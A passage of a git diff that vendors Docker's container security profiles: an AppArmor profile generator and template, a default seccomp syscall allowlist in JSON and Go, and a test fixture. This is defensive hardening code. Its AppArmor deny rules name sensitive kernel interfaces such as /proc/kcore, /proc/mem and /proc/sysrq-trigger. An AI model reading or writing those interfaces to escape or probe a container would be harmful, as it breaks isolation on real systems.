type: rebuild + settings: { + # When configurations are empty, the `rebuild` operation rebuilds all the currently + # known statuses for that pull request. + configurations: [], + label: "rebuild/*", + } + - type: rebuild + settings: { + configurations: [ arm ], + label: "rebuild/arm", + } + - type: rebuild + settings: { + configurations: [ experimental ], + label: "rebuild/experimental", + } + - type: rebuild + settings: { + configurations: [ janky ], + label: "rebuild/janky", + } + - type: rebuild + settings: { + configurations: [ userns ], + label: "rebuild/userns", + } + - type: rebuild + settings: { + configurations: [ vendor ], + label: "rebuild/vendor", + } + - type: rebuild + settings: { + configurations: [ win2lin ], + label: "rebuild/win2lin", + } + - type: rebuild + settings: { + configurations: [ windowsRS1 ], + label: "rebuild/windowsRS1", + } diff --git a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go new file mode 100644 index 0000000000..5132ebe008 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go @@ -0,0 +1,122 @@ +// +build linux + +package apparmor + +import ( + "bufio" + "io" + "io/ioutil" + "os" + "path" + "strings" + + "github.com/docker/docker/pkg/aaparser" + "github.com/docker/docker/utils/templates" +) + +var ( + // profileDirectory is the file store for apparmor profiles and macros. + profileDirectory = "/etc/apparmor.d" +) + +// profileData holds information about the given profile for generation. +type profileData struct { + // Name is profile name. + Name string + // Imports defines the apparmor functions to import, before defining the profile. + Imports []string + // InnerImports defines the apparmor functions to import in the profile. + InnerImports []string + // Version is the {major, minor, patch} version of apparmor_parser as a single number. + Version int +} + +// generateDefault creates an apparmor profile from ProfileData. +func (p *profileData) generateDefault(out io.Writer) error { + compiled, err := templates.NewParse("apparmor_profile", baseTemplate) + if err != nil { + return err + } + + if macroExists("tunables/global") { + p.Imports = append(p.Imports, "#include ") + } else { + p.Imports = append(p.Imports, "@{PROC}=/proc/") + } + + if macroExists("abstractions/base") { + p.InnerImports = append(p.InnerImports, "#include ") + } + + ver, err := aaparser.GetVersion() + if err != nil { + return err + } + p.Version = ver + + if err := compiled.Execute(out, p); err != nil { + return err + } + return nil +} + +// macrosExists checks if the passed macro exists. +func macroExists(m string) bool { + _, err := os.Stat(path.Join(profileDirectory, m)) + return err == nil +} + +// InstallDefault generates a default profile in a temp directory determined by +// os.TempDir(), then loads the profile into the kernel using 'apparmor_parser'. +func InstallDefault(name string) error { + p := profileData{ + Name: name, + } + + // Install to a temporary directory. + f, err := ioutil.TempFile("", name) + if err != nil { + return err + } + profilePath := f.Name() + + defer f.Close() + defer os.Remove(profilePath) + + if err := p.generateDefault(f); err != nil { + f.Close() + return err + } + + if err := aaparser.LoadProfile(profilePath); err != nil { + return err + } + + return nil +} + +// IsLoaded checks if a profile with the given name has been loaded into the +// kernel. +func IsLoaded(name string) (bool, error) { + file, err := os.Open("/sys/kernel/security/apparmor/profiles") + if err != nil { + return false, err + } + defer file.Close() + + r := bufio.NewReader(file) + for { + p, err := r.ReadString('\n') + if err == io.EOF { + break + } + if err != nil { + return false, err + } + if strings.HasPrefix(p, name+" ") { + return true, nil + } + } + + return false, nil +} diff --git a/vendor/github.com/docker/docker/profiles/apparmor/template.go b/vendor/github.com/docker/docker/profiles/apparmor/template.go new file mode 100644 index 0000000000..c5ea4584de --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/apparmor/template.go @@ -0,0 +1,46 @@ +// +build linux + +package apparmor + +// baseTemplate defines the default apparmor profile for containers. +const baseTemplate = ` +{{range $value := .Imports}} +{{$value}} +{{end}} + +profile {{.Name}} flags=(attach_disconnected,mediate_deleted) { +{{range $value := .InnerImports}} + {{$value}} +{{end}} + + network, + capability, + file, + umount, + + deny @{PROC}/* w, # deny write for all files directly in /proc (not in a subdir) + # deny write to files not in /proc//** or /proc/sys/** + deny @{PROC}/{[^1-9],[^1-9][^0-9],[^1-9s][^0-9y][^0-9s],[^1-9][^0-9][^0-9][^0-9]*}/** w, + deny @{PROC}/sys/[^k]** w, # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel) + deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w, # deny everything except shm* in /proc/sys/kernel/ + deny @{PROC}/sysrq-trigger rwklx, + deny @{PROC}/mem rwklx, + deny @{PROC}/kmem rwklx, + deny @{PROC}/kcore rwklx, + + deny mount, + + deny /sys/[^f]*/** wklx, + deny /sys/f[^s]*/** wklx, + deny /sys/fs/[^c]*/** wklx, + deny /sys/fs/c[^g]*/** wklx, + deny /sys/fs/cg[^r]*/** wklx, + deny /sys/firmware/** rwklx, + deny /sys/kernel/security/** rwklx, + +{{if ge .Version 208095}} + # suppress ptrace denials when using 'docker ps' or using 'ps' inside a container + ptrace (trace,read) peer={{.Name}}, +{{end}} +} +` diff --git a/vendor/github.com/docker/docker/profiles/seccomp/default.json b/vendor/github.com/docker/docker/profiles/seccomp/default.json new file mode 100755 index 0000000000..ac129d3a31 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/default.json @@ -0,0 +1,698 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "archMap": [ + { + "architecture": "SCMP_ARCH_X86_64", + "subArchitectures": [ + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ] + }, + { + "architecture": "SCMP_ARCH_AARCH64", + "subArchitectures": [ + "SCMP_ARCH_ARM" + ] + }, + { + "architecture": "SCMP_ARCH_MIPS64", + "subArchitectures": [ + "SCMP_ARCH_MIPS", + "SCMP_ARCH_MIPS64N32" + ] + }, + { + "architecture": "SCMP_ARCH_MIPS64N32", + "subArchitectures": [ + "SCMP_ARCH_MIPS", + "SCMP_ARCH_MIPS64" + ] + }, + { + "architecture": "SCMP_ARCH_MIPSEL64", + "subArchitectures": [ + "SCMP_ARCH_MIPSEL", + "SCMP_ARCH_MIPSEL64N32" + ] + }, + { + "architecture": "SCMP_ARCH_MIPSEL64N32", + "subArchitectures": [ + "SCMP_ARCH_MIPSEL", + "SCMP_ARCH_MIPSEL64" + ] + }, + { + "architecture": "SCMP_ARCH_S390X", + "subArchitectures": [ + "SCMP_ARCH_S390" + ] + } + ], + "syscalls": [ + { + "names": [ + "accept", + "accept4", + "access", + "alarm", + "alarm", + "bind", + "brk", + "capget", + "capset", + "chdir", + "chmod", + "chown", + "chown32", + "clock_getres", + "clock_gettime", + "clock_nanosleep", + "close", + "connect", + "copy_file_range", + "creat", + "dup", + "dup2", + "dup3", + "epoll_create", + "epoll_create1", + "epoll_ctl", + "epoll_ctl_old", + "epoll_pwait", + "epoll_wait", + "epoll_wait_old", + "eventfd", + "eventfd2", + "execve", + "execveat", + "exit", + "exit_group", + "faccessat", + "fadvise64", + "fadvise64_64", + "fallocate", + "fanotify_mark", + "fchdir", + "fchmod", + "fchmodat", + "fchown", + "fchown32", + "fchownat", + "fcntl", + "fcntl64", + "fdatasync", + "fgetxattr", + "flistxattr", + "flock", + "fork", + "fremovexattr", + "fsetxattr", + "fstat", + "fstat64", + "fstatat64", + "fstatfs", + "fstatfs64", + "fsync", + "ftruncate", + "ftruncate64", + "futex", + "futimesat", + "getcpu", + "getcwd", + "getdents", + "getdents64", + "getegid", + "getegid32", + "geteuid", + "geteuid32", + "getgid", + "getgid32", + "getgroups", + "getgroups32", + "getitimer", + "getpeername", + "getpgid", + "getpgrp", + "getpid", + "getppid", + "getpriority", + "getrandom", + "getresgid", + "getresgid32", + "getresuid", + "getresuid32", + "getrlimit", + "get_robust_list", + "getrusage", + "getsid", + "getsockname", + "getsockopt", + "get_thread_area", + "gettid", + "gettimeofday", + "getuid", + "getuid32", + "getxattr", + "inotify_add_watch", + "inotify_init", + "inotify_init1", + "inotify_rm_watch", + "io_cancel", + "ioctl", + "io_destroy", + "io_getevents", + "ioprio_get", + "ioprio_set", + "io_setup", + "io_submit", + "ipc", + "kill", + "lchown", + "lchown32", + "lgetxattr", + "link", + "linkat", + "listen", + "listxattr", + "llistxattr", + "_llseek", + "lremovexattr", + "lseek", + "lsetxattr", + "lstat", + "lstat64", + "madvise", + "memfd_create", + "mincore", + "mkdir", + "mkdirat", + "mknod", + "mknodat", + "mlock", + "mlock2", + "mlockall", + "mmap", + "mmap2", + "mprotect", + "mq_getsetattr", + "mq_notify", + "mq_open", + "mq_timedreceive", + "mq_timedsend", + "mq_unlink", + "mremap", + "msgctl", + "msgget", + "msgrcv", + "msgsnd", + "msync", + "munlock", + "munlockall", + "munmap", + "nanosleep", + "newfstatat", + "_newselect", + "open", + "openat", + "pause", + "pipe", + "pipe2", + "poll", + "ppoll", + "prctl", + "pread64", + "preadv", + "prlimit64", + "pselect6", + "pwrite64", + "pwritev", + "read", + "readahead", + "readlink", + "readlinkat", + "readv", + "recv", + "recvfrom", + "recvmmsg", + "recvmsg", + "remap_file_pages", + "removexattr", + "rename", + "renameat", + "renameat2", + "restart_syscall", + "rmdir", + "rt_sigaction", + "rt_sigpending", + "rt_sigprocmask", + "rt_sigqueueinfo", + "rt_sigreturn", + "rt_sigsuspend", + "rt_sigtimedwait", + "rt_tgsigqueueinfo", + "sched_getaffinity", + "sched_getattr", + "sched_getparam", + "sched_get_priority_max", + "sched_get_priority_min", + "sched_getscheduler", + "sched_rr_get_interval", + "sched_setaffinity", + "sched_setattr", + "sched_setparam", + "sched_setscheduler", + "sched_yield", + "seccomp", + "select", + "semctl", + "semget", + "semop", + "semtimedop", + "send", + "sendfile", + "sendfile64", + "sendmmsg", + "sendmsg", + "sendto", + "setfsgid", + "setfsgid32", + "setfsuid", + "setfsuid32", + "setgid", + "setgid32", + "setgroups", + "setgroups32", + "setitimer", + "setpgid", + "setpriority", + "setregid", + "setregid32", + "setresgid", + "setresgid32", + "setresuid", + "setresuid32", + "setreuid", + "setreuid32", + "setrlimit", + "set_robust_list", + "setsid", + "setsockopt", + "set_thread_area", + "set_tid_address", + "setuid", + "setuid32", + "setxattr", + "shmat", + "shmctl", + "shmdt", + "shmget", + "shutdown", + "sigaltstack", + "signalfd", + "signalfd4", + "sigreturn", + "socket", + "socketcall", + "socketpair", + "splice", + "stat", + "stat64", + "statfs", + "statfs64", + "symlink", + "symlinkat", + "sync", + "sync_file_range", + "syncfs", + "sysinfo", + "syslog", + "tee", + "tgkill", + "time", + "timer_create", + "timer_delete", + "timerfd_create", + "timerfd_gettime", + "timerfd_settime", + "timer_getoverrun", + "timer_gettime", + "timer_settime", + "times", + "tkill", + "truncate", + "truncate64", + "ugetrlimit", + "umask", + "uname", + "unlink", + "unlinkat", + "utime", + "utimensat", + "utimes", + "vfork", + "vmsplice", + "wait4", + "waitid", + "waitpid", + "write", + "writev" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 0, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 8, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 4294967295, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "arm_fadvise64_64", + "arm_sync_file_range", + "breakpoint", + "cacheflush", + "set_tls" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "arm", + "arm64" + ] + }, + "excludes": {} + }, + { + "names": [ + "arch_prctl" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "amd64", + "x32" + ] + }, + "excludes": {} + }, + { + "names": [ + "modify_ldt" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "amd64", + "x32", + "x86" + ] + }, + "excludes": {} + }, + { + "names": [ + "s390_pci_mmio_read", + "s390_pci_mmio_write", + "s390_runtime_instr" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "s390", + "s390x" + ] + }, + "excludes": {} + }, + { + "names": [ + "open_by_handle_at" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_DAC_READ_SEARCH" + ] + }, + "excludes": {} + }, + { + "names": [ + "bpf", + "clone", + "fanotify_init", + "lookup_dcookie", + "mount", + "name_to_handle_at", + "perf_event_open", + "setdomainname", + "sethostname", + "setns", + "umount", + "umount2", + "unshare" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_ADMIN" + ] + }, + "excludes": {} + }, + { + "names": [ + "clone" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": { + "caps": [ + "CAP_SYS_ADMIN" + ], + "arches": [ + "s390", + "s390x" + ] + } + }, + { + "names": [ + "clone" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 1, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ], + "comment": "s390 parameter ordering for clone is different", + "includes": { + "arches": [ + "s390", + "s390x" + ] + }, + "excludes": { + "caps": [ + "CAP_SYS_ADMIN" + ] + } + }, + { + "names": [ + "reboot" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_BOOT" + ] + }, + "excludes": {} + }, + { + "names": [ + "chroot" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_CHROOT" + ] + }, + "excludes": {} + }, + { + "names": [ + "delete_module", + "init_module", + "finit_module", + "query_module" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_MODULE" + ] + }, + "excludes": {} + }, + { + "names": [ + "acct" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_PACCT" + ] + }, + "excludes": {} + }, + { + "names": [ + "kcmp", + "process_vm_readv", + "process_vm_writev", + "ptrace" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_PTRACE" + ] + }, + "excludes": {} + }, + { + "names": [ + "iopl", + "ioperm" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_RAWIO" + ] + }, + "excludes": {} + }, + { + "names": [ + "settimeofday", + "stime", + "adjtimex" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_TIME" + ] + }, + "excludes": {} + }, + { + "names": [ + "vhangup" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_TTY_CONFIG" + ] + }, + "excludes": {} + } + ] +} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json b/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json new file mode 100755 index 0000000000..674ca50fd9 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json @@ -0,0 +1,27 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "syscalls": [ + { + "name": "clone", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ] + }, + { + "name": "open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "close", + "action": "SCMP_ACT_ALLOW", + "args": [] + } + ] +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/generate.go b/vendor/github.com/docker/docker/profiles/seccomp/generate.go new file mode 100644 index 0000000000..32f22bb375 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/generate.go @@ -0,0 +1,32 @@ +// +build ignore + +package main + +import ( + "encoding/json" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/profiles/seccomp" +) + +// saves the default seccomp profile as a json file so people can use it as a +// base for their own custom profiles +func main() { + wd, err := os.Getwd() + if err != nil { + panic(err) + } + f := filepath.Join(wd, "default.json") + + // write the default profile to the file + b, err := json.MarshalIndent(seccomp.DefaultProfile(), "", "\t") + if err != nil { + panic(err) + } + + if err := ioutil.WriteFile(f, b, 0644); err != nil { + panic(err) + } +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go new file mode 100644 index 0000000000..a54ef50a8b --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go @@ -0,0 +1,150 @@ +// +build linux + +package seccomp + +import ( + "encoding/json" + "errors" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringutils" + "github.com/opencontainers/runtime-spec/specs-go" + libseccomp "github.com/seccomp/libseccomp-golang" +) + +//go:generate go run -tags 'seccomp' generate.go + +// GetDefaultProfile returns the default seccomp profile. +func GetDefaultProfile(rs *specs.Spec) (*specs.Seccomp, error) { + return setupSeccomp(DefaultProfile(), rs) +} + +// LoadProfile takes a file path and decodes the seccomp profile. +func LoadProfile(body string, rs *specs.Spec) (*specs.Seccomp, error) { + var config types.Seccomp + if err := json.Unmarshal([]byte(body), &config); err != nil { + return nil, fmt.Errorf("Decoding seccomp profile failed: %v", err) + } + return setupSeccomp(&config, rs) +} + +var nativeToSeccomp = map[string]types.Arch{ + "amd64": types.ArchX86_64, + "arm64": types.ArchAARCH64, + "mips64": types.ArchMIPS64, + "mips64n32": types.ArchMIPS64N32, + "mipsel64": types.ArchMIPSEL64, + "mipsel64n32": types.ArchMIPSEL64N32, + "s390x": types.ArchS390X, +} + +func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) { + if config == nil { + return nil, nil + } + + // No default action specified, no syscalls listed, assume seccomp disabled + if config.DefaultAction == "" && len(config.Syscalls) == 0 { + return nil, nil + } + + newConfig := &specs.Seccomp{} + + var arch string + var native, err = libseccomp.GetNativeArch() + if err == nil { + arch = native.String() + } + + if len(config.Architectures) != 0 && len(config.ArchMap) != 0 { + return nil, errors.New("'architectures' and 'archMap' were specified in the seccomp profile, use either 'architectures' or 'archMap'") + } + + // if config.Architectures == 0 then libseccomp will figure out the architecture to use + if len(config.Architectures) != 0 { + for _, a := range config.Architectures { + newConfig.Architectures = append(newConfig.Architectures, specs.Arch(a)) + } + } + + if len(config.ArchMap) != 0 { + for _, a := range config.ArchMap { + seccompArch, ok := nativeToSeccomp[arch] + if ok { + if a.Arch == seccompArch { + newConfig.Architectures = append(newConfig.Architectures, specs.Arch(a.Arch)) + for _, sa := range a.SubArches { + newConfig.Architectures = append(newConfig.Architectures, specs.Arch(sa)) + } + break + } + } + } + } + + newConfig.DefaultAction = specs.Action(config.DefaultAction) + +Loop: + // Loop through all syscall blocks and convert them to libcontainer format after filtering them + for _, call := range config.Syscalls { + if len(call.Excludes.Arches) > 0 { + if stringutils.InSlice(call.Excludes.Arches, arch) { + continue Loop + } + } + if len(call.Excludes.Caps) > 0 { + for _, c := range call.Excludes.Caps { + if stringutils.InSlice(rs.Process.Capabilities, c) { + continue Loop + } + } + } + if len(call.Includes.Arches) > 0 { + if !stringutils.InSlice(call.Includes.Arches, arch) { + continue Loop + } + } + if len(call.Includes.Caps) > 0 { + for _, c := range call.Includes.Caps { + if !stringutils.InSlice(rs.Process.Capabilities, c) { + continue Loop + } + } + } + + if call.Name != "" && len(call.Names) != 0 { + return nil, errors.New("'name' and 'names' were specified in the seccomp profile, use either 'name' or 'names'") + } + + if call.Name != "" { + newConfig.Syscalls = append(newConfig.Syscalls, createSpecsSyscall(call.Name, call.Action, call.Args)) + } + + for _, n := range call.Names { + newConfig.Syscalls = append(newConfig.Syscalls, createSpecsSyscall(n, call.Action, call.Args)) + } + } + + return newConfig, nil +} + +func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.Syscall { + newCall := specs.Syscall{ + Name: name, + Action: specs.Action(action), + } + + // Loop through all the arguments of the syscall and convert them + for _, arg := range args { + newArg := specs.Arg{ + Index: arg.Index, + Value: arg.Value, + ValueTwo: arg.ValueTwo, + Op: specs.Operator(arg.Op), + } + + newCall.Args = append(newCall.Args, newArg) + } + return newCall +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go new file mode 100644 index 0000000000..b84de820b7 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go @@ -0,0 +1,604 @@ +// +build linux,seccomp + +package seccomp + +import ( + "syscall" + + "github.com/docker/docker/api/types" +) + +func arches() []types.Architecture { + return []types.Architecture{ + { + Arch: types.ArchX86_64, + SubArches: []types.Arch{types.ArchX86, types.ArchX32}, + }, + { + Arch: types.ArchAARCH64, + SubArches: []types.Arch{types.ArchARM}, + }, + { + Arch: types.ArchMIPS64, + SubArches: []types.Arch{types.ArchMIPS, types.ArchMIPS64N32}, + }, + { + Arch: types.ArchMIPS64N32, + SubArches: []types.Arch{types.ArchMIPS, types.ArchMIPS64}, + }, + { + Arch: types.ArchMIPSEL64, + SubArches: []types.Arch{types.ArchMIPSEL, types.ArchMIPSEL64N32}, + }, + { + Arch: types.ArchMIPSEL64N32, + SubArches: []types.Arch{types.ArchMIPSEL, types.ArchMIPSEL64}, + }, + { + Arch: types.ArchS390X, + SubArches: []types.Arch{types.ArchS390}, + }, + } +} + +// DefaultProfile defines the whitelist for the default seccomp profile. +func DefaultProfile() *types.Seccomp { + syscalls := []*types.Syscall{ + { + Names: []string{ + "accept", + "accept4", + "access", + "alarm", + "alarm", + "bind", + "brk", + "capget", + "capset", + "chdir", + "chmod", + "chown", + "chown32", + "clock_getres", + "clock_gettime", + "clock_nanosleep", + "close", + "connect", + "copy_file_range", + "creat", + "dup", + "dup2", + "dup3", + "epoll_create", + "epoll_create1", + "epoll_ctl", + "epoll_ctl_old", + "epoll_pwait", + "epoll_wait", + "epoll_wait_old", + "eventfd", + "eventfd2", + "execve", + "execveat", + "exit", + "exit_group", + "faccessat", + "fadvise64", + "fadvise64_64", + "fallocate", + "fanotify_mark", + "fchdir", + "fchmod", + "fchmodat", + "fchown", + "fchown32", + "fchownat", + "fcntl", + "fcntl64", + "fdatasync", + "fgetxattr", + "flistxattr", + "flock", + "fork", + "fremovexattr", + "fsetxattr", + "fstat", + "fstat64", + "fstatat64", + "fstatfs", + "fstatfs64", + "fsync", + "ftruncate", + "ftruncate64", + "futex", + "futimesat", + "getcpu", + "getcwd", + "getdents", + "getdents64", + "getegid", + "getegid32", + "geteuid", + "geteuid32", + "getgid", + "getgid32", + "getgroups", + "getgroups32", + "getitimer", + "getpeername", + "getpgid", + "getpgrp", + "getpid", + "getppid", + "getpriority", + "getrandom", + "getresgid", + "getresgid32", + "getresuid", + "getresuid32", + "getrlimit", + "get_robust_list", + "getrusage", + "getsid", + "getsockname", + "getsockopt", + "get_thread_area", + "gettid", + "gettimeofday", + "getuid", + "getuid32", + "getxattr", + "inotify_add_watch", + "inotify_init", + "inotify_init1", + "inotify_rm_watch", + "io_cancel", + "ioctl", + "io_destroy", + "io_getevents", + "ioprio_get", + "ioprio_set", + "io_setup", + "io_submit", + "ipc", + "kill", + "lchown", + "lchown32", + "lgetxattr", + "link", + "linkat", + "listen", + "listxattr", + "llistxattr", + "_llseek", + "lremovexattr", + "lseek", + "lsetxattr", + "lstat", + "lstat64", + "madvise", + "memfd_create", + "mincore", + "mkdir", + "mkdirat", + "mknod", + "mknodat", + "mlock", + "mlock2", + "mlockall", + "mmap", + "mmap2", + "mprotect", + "mq_getsetattr", + "mq_notify", + "mq_open", + "mq_timedreceive", + "mq_timedsend", + "mq_unlink", + "mremap", + "msgctl", + "msgget", + "msgrcv", + "msgsnd", + "msync", + "munlock", + "munlockall", + "munmap", + "nanosleep", + "newfstatat", + "_newselect", + "open", + "openat", + "pause", + "pipe", + "pipe2", + "poll", + "ppoll", + "prctl", + "pread64", + "preadv", + "prlimit64", + "pselect6", + "pwrite64", + "pwritev", + "read", + "readahead", + "readlink", + "readlinkat", + "readv", + "recv", + "recvfrom", + "recvmmsg", + "recvmsg", + "remap_file_pages", + "removexattr", + "rename", + "renameat", + "renameat2", + "restart_syscall", + "rmdir", + "rt_sigaction", + "rt_sigpending", + "rt_sigprocmask", + "rt_sigqueueinfo", + "rt_sigreturn", + "rt_sigsuspend", + "rt_sigtimedwait", + "rt_tgsigqueueinfo", + "sched_getaffinity", + "sched_getattr", + "sched_getparam", + "sched_get_priority_max", + "sched_get_priority_min", + "sched_getscheduler", + "sched_rr_get_interval", + "sched_setaffinity", + "sched_setattr", + "sched_setparam", + "sched_setscheduler", + "sched_yield", + "seccomp", + "select", + "semctl", + "semget", + "semop", + "semtimedop", + "send", + "sendfile", + "sendfile64", + "sendmmsg", + "sendmsg", + "sendto", + "setfsgid", + "setfsgid32", + "setfsuid", + "setfsuid32", + "setgid", + "setgid32", + "setgroups", + "setgroups32", + "setitimer", + "setpgid", + "setpriority", + "setregid", + "setregid32", + "setresgid", + "setresgid32", + "setresuid", + "setresuid32", + "setreuid", + "setreuid32", + "setrlimit", + "set_robust_list", + "setsid", + "setsockopt", + "set_thread_area", + "set_tid_address", + "setuid", + "setuid32", + "setxattr", + "shmat", + "shmctl", + "shmdt", + "shmget", + "shutdown", + "sigaltstack", + "signalfd", + "signalfd4", + "sigreturn", + "socket", + "socketcall", + "socketpair", + "splice", + "stat", + "stat64", + "statfs", + "statfs64", + "symlink", + "symlinkat", + "sync", + "sync_file_range", + "syncfs", + "sysinfo", + "syslog", + "tee", + "tgkill", + "time", + "timer_create", + "timer_delete", + "timerfd_create", + "timerfd_gettime", + "timerfd_settime", + "timer_getoverrun", + "timer_gettime", + "timer_settime", + "times", + "tkill", + "truncate", + "truncate64", + "ugetrlimit", + "umask", + "uname", + "unlink", + "unlinkat", + "utime", + "utimensat", + "utimes", + "vfork", + "vmsplice", + "wait4", + "waitid", + "waitpid", + "write", + "writev", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x0, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x0008, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0xffffffff, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{ + "arm_fadvise64_64", + "arm_sync_file_range", + "breakpoint", + "cacheflush", + "set_tls", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"arm", "arm64"}, + }, + }, + { + Names: []string{ + "arch_prctl", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"amd64", "x32"}, + }, + }, + { + Names: []string{ + "modify_ldt", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"amd64", "x32", "x86"}, + }, + }, + { + Names: []string{ + "s390_pci_mmio_read", + "s390_pci_mmio_write", + "s390_runtime_instr", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"s390", "s390x"}, + }, + }, + { + Names: []string{ + "open_by_handle_at", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_DAC_READ_SEARCH"}, + }, + }, + { + Names: []string{ + "bpf", + "clone", + "fanotify_init", + "lookup_dcookie", + "mount", + "name_to_handle_at", + "perf_event_open", + "setdomainname", + "sethostname", + "setns", + "umount", + "umount2", + "unshare", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_ADMIN"}, + }, + }, + { + Names: []string{ + "clone", + }, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + ValueTwo: 0, + Op: types.OpMaskedEqual, + }, + }, + Excludes: types.Filter{ + Caps: []string{"CAP_SYS_ADMIN"}, + Arches: []string{"s390", "s390x"}, + }, + }, + { + Names: []string{ + "clone", + }, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 1, + Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + ValueTwo: 0, + Op: types.OpMaskedEqual, + }, + }, + Comment: "s390 parameter ordering for clone is different", + Includes: types.Filter{ + Arches: []string{"s390", "s390x"}, + }, + Excludes: types.Filter{ + Caps: []string{"CAP_SYS_ADMIN"}, + }, + }, + { + Names: []string{ + "reboot", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_BOOT"}, + }, + }, + { + Names: []string{ + "chroot", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: 